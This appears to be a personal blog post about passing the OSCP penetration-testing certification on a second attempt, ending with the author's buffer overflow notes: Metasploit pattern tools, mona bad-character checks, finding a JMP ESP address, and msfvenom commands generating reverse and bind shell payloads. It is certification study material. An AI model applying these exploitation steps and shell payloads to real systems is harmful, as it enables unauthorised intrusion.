OSCP – how to pass first time, like I didn’t.

Part 1: So it was a cold, dark and rainy November morning in Surrey, back in 2018. It was my second year of studying a MSc in Information Security at Royal Holloway, University of London. I had decided if I was going to pursue a career as a pentester, I needed some qualifications. I did my research and these were my opinions from a U.K. citizen not working in industry.

I needed a qualification which would show I had practical hacking skills. I felt anyone can study content, take an exam and get a degree or MSc if they are determined. I was already pursuing this whilst having a full time job (out of industry), being a parent, and running a web development business in Cobham, Surrey as a freelance web developer, registered as a sole trader. This was a lot, but I needed to prove my worth. So after doing some research I decided upon a few qualifications:

• CEH
• CREST
• OSCP

From looking at job postings, it was clear that Crest and OSCP were favourable and held more weight. Now, what I liked about OSCP was that it was entirely practical. It looked like a really well developed course that would get me hacking. So I enrolled.

I worked through the course material, watching the videos and completing the exercises in the PDF in any spare moment I got, like a good student. However, after several months, I was prioritising this rather than the MSc which has set me back a little cash. I did not want to waste the MSc, and had not even entered the OSCP labs. I made the decision to put the OSCP on hold until I had more time. I had already learned a lot and been introduced to a variety of tools. However, this was just the beginning.

Covid, Opportunities and HackTheBox (HTB)

Part 2: Enter Covid-19. Now, as soon as this whole pandemic kicked off, I knew I needed to use this time wisely, especially as I was going to be having time off work over the Summer as well. As I was going to be completing my MSc the following year and then looking for jobs, I saw this as the perfect time to finish my exams for my MSc and then to spend every waking hour in the OSCP labs.

I booked my exam for July as well as purchasing 30 days of intense lab time. The labs weren’t to start for 2 weeks, so I started practicing over at HackTheBox.eu the first couple of machines were my first and boy what a rush was it when I got those root shells. And you know what, that rush and feeling of sheer accomplishment never goes, EVER!

OSCP Labs

This is not an exaggeration. I spent every waking moment in the OSCP labs. I would get up extra early for work to try and complete a machine before work. During work, I would take every opportunity to be working on it, running a nmap scan in the background whilst working on something, my mind constantly working on puzzles and thinking of attack paths — multitasking at its finest. I would then get home from work, and work in the labs. Now I was torn at points, as I wanted to spend time with my daughters, but knew I needed this qualification to get an edge when applying for jobs. I would work in the labs until it was time to turn in for the day. I did this on repeat for the entirety of my lab time, until my lab time was up. I extended it by another 30 days as I had made so much progress. At the beginning of this journey it took me perhaps 2 to 3 days to “p0wn” a box. By the end of the 60 days I was doing perhaps 2 a day.

Exam time — Take 1

To be honest, the entire 24 hour exam thing whilst being proctored scared me senseless. I did not know what to expect. I had bought a laptop specifically for hacking, as well as an ethernet cable as I wanted a dedicated and reliable Internet connection. My biggest fear would be that I would be doing well in the exam and my connection would cut out and then I would fail as they had lost sight of me. Now, the proctors were very supportive. I began the exam at 7PM. I was fully aware of the time and had an idea that I would work until exhaustion and then maybe sleep a tiny amount, or perhaps I would just work through the night and hope for the best. I made good progress initially and felt I might just be able to do it!! However, as time went by, and scans such as nikto ran slow or were ineffective (did not use it in the second attempt at all, relying on gobuster or wfuzz instead), pressure mounted, as did my stress, as did my tiredness, and then, undoubtedly, my hopes of passing. I did not want to sleep or leave the machine for fear of any accusations of malpractice. So perhaps went to the toilet once, slept with the camera on me, with the lights on etc. Now this was silly and my own doing. I ended up working until 6:30PM the following day, before throwing the towel in, beaten and battered by my lack of methodology and experience. Sad times, very sad times.

Exam Time — Take 2

I bought more lab time, practiced, practiced, and practiced. I had managed to get root access on a minimum of 40 Public network machines in the OSCP labs. A friend of mine from Royal Holloway had suggested Tib3rius. Now this dude, totally saved me on Buffer Overflows. This made all the difference and instead of failing buffer overflow like I did on the first attempt. He really explained and broke things down. https://tryhackme.com/room/bufferoverflowprep I initially looked at this, but what really helped me was his YouTube video:

I literally watched this video no fewer times than 10, I kid you not. On the day of my exam, I watched it over 3 times, ensuring my notes were 100% correct. Sure enough I had got the proof.txt for the buffer overflow in under an hour during the exam. I hated it when I heard people say that it’s an “easy” 25 pointer. I sometimes feel this, that when people write up their OSCP exam experiences, they try and make themselves sound a bit better than they are so they sound oh so “Hack3rM4N God LVL lulz”. But to be honest, it is highly technical, and you need a really good understanding of registers and Assembly in my opinion. This cannot be blagged, you have to know your stuff. That is why as an auditory and visual learner, I really digged Tib3rius’ clear instructions. Furthermore, this was the majority of my examination report with many, many screenshots. This reduced my stress, and I then looked at the other machines and points I needed to secure a pass.

I then went for big pointers as I knew I needed to reduce stress. I also knew I had plenty of time, and just needed to follow a strong methodology. Now, I won’t be going into specifics here. But with most machines in the labs and on HackTheBox I found a pattern:

Port scan — this is the key. They tell a story. I kid you not.

For example if you see ports 80 and 22 open. Then that means, you know it’s a web server and you’ll have to brute force directories or do some sort of SQLi or look for a weak web application with a vulnerability to find credentials. These credentials or a variant of them can then be used to SSH in. Then from there you may have to escalate privileges. Use winpeas or linpeas (depending on OS) or alternative to determine further information such as hashes or stored passwords or services running as root etc. It literally is a jigsaw puzzle. And by gathering information from everywhere you can, it is like gaining more jigsaw pieces. Now sometimes, you may be able to complete the puzzle and see what it is without having all the pieces, or sometimes you may need a few more pieces. Either way, this time I was far more successful, probably dropping only around 10 points — ending with 90/100.

What was different this time round?

My preparation. I literally came up with a time plan with targets for the entire exam. This gave me structure and kept me from losing my mind. I also had experience from the previous exam so my stress levels were lower. I had a lot riding on this exam, otherwise I may find it hard to procure a job. Furthermore, I had sacrificed precious time with my 2 daughters, time I will never get back and I was not going to go down without a fight this round. I learned from my mistakes, learned not to use nikto lol, and had far, far more experience.

I also made extremely clear and concise notes for the buffer overflow, which I will be including below. I also have a sheet of my go to commands from hackthebox and the OSCP labs.

Without further ado, here are my notes, and you can see I carefully planned how I would perform my attack. This is what you should do for all eventualities. You should think of things that can go wrong, and how you may sidestep and still manage to perform an attack. In my first attempt, I would be blindsided if something did not work. In my second, I would adapt. You have to be fluid and creative. Think of another way around. All machines are vulnerable, there is a way. All you need to do is not give up and “TRY HARDER”. It literally is it. Do not give up.

Without further ado, here are my notes I used from Tib3rius. So to my friend who suggested Tib3rius, and to Tib3rius, thank you. You started my exam off on the right foot and helped me considerably:

A nice tutorial on Buffer Overflows: have up during exam for reference:

Tib3rius: https://youtu.be/1X2JGF_9JGM — refer to in exam if get stuck or worried.

https://github.com/gh0x0st/Buffer_Overflow

Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l number
Put pattern into exploit (change the junk variable), send to input/program
Look for EIP getting overwritten.
Make note of the characters.

Find offset:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q EIPValue
This gives us the offset to use as part of the buffer/junk.

Find Barchars:
Update Python code
Restart app, play, and run exploit.py
Look for: Access violation when executing 42424242 — which are 4 B’s.
Badchars would be loaded into ESP register.
Right click on ESP register, and click ‘follow in dump’
!mona bytearray -b “\x00”
Will output a .bin file.

Then want to compare everything in ESP with the output, so will use mona compare.
!mona compare -f C:\pathtothebinfile.bin -a address
The address is the value that is currently in the ESP register on the top right of the screen.
Press return.
This gives us our bad chars on first round.
However, if you have 2 consecutive bytes e.g. \x07\x08\, remove the first from our bad chars string, and regenerate the bin. file with !mona bytearray -b “\x00\x07” for example
Relaunch the app
Modify exploit code (bad chars without the x07)
Recrash the application by sending the python epxloit: python exploit.py

Now rerun compare command, however, ESP address may have changed.
!mona compare -f C:\pathtothebinfile.bin -a address
Press return, and check bad chars.
Right click on ESP and follow dump to check the bad chars that are there.

Keep repeating the above process, until you get ‘unmodified’.

Finding JMP Point:
!mona jmp -r esp -cpb “\x00…barchars”
Should get another window.
Window — log data
Find an address at the bottom that has JMP. Get the address.
Have to write address backwards in 2’s.
e.g. address on far left: 625011af
\xaf\x11\x50\x62
This will be used instead of the B’s.
Right click on the address in the log window we have, and add breakpoint.

Update payload with msfvenom:
Ensure IP is of target machine, and not of the Windows test machine which we have been using.
msfvenom -p windows/shell_reverse_tcp LHOST=ip.ip.ip.ip LPORT=53 EXITFUNC=thread -b “\x00\bacchars” -f c
OR:
msfvenom –p windows/shell_bind_tcp EXITFUNC=thread LPORT=80 -f c -a x86 — platform windows -b “\0x00\bachars”
Copy everything from the first quote to the end quote (not the semicolon at the end) with the generated shellcode.
Check x86/shikata_ga_nai encoder has been used in the output, as will need to use nops later on
Add to python exploit in payload variable.

Add NOPs padding:
Can use 16 or 64.
As x86/shikata_ga_nai encoder used (it would use up memory) so we need to add some NOPs, as we don’t want it to overwrite registers.

Potential issues:
If can’t copy strings between rdesktop and my kali system (as needed by msfvenom), can develop Python exploit on kali system instead and point it to the windows test machine.

This is just the beginning

First and foremost, thank you Offensive Security for putting together such a thorough, enjoyable and literally life-changing course and qualification. What a journey it has been, but I have just dipped my toes into the world of Penetration Testing, but boy does that water feel good on my toes! lol. I completed OSCP September 2020.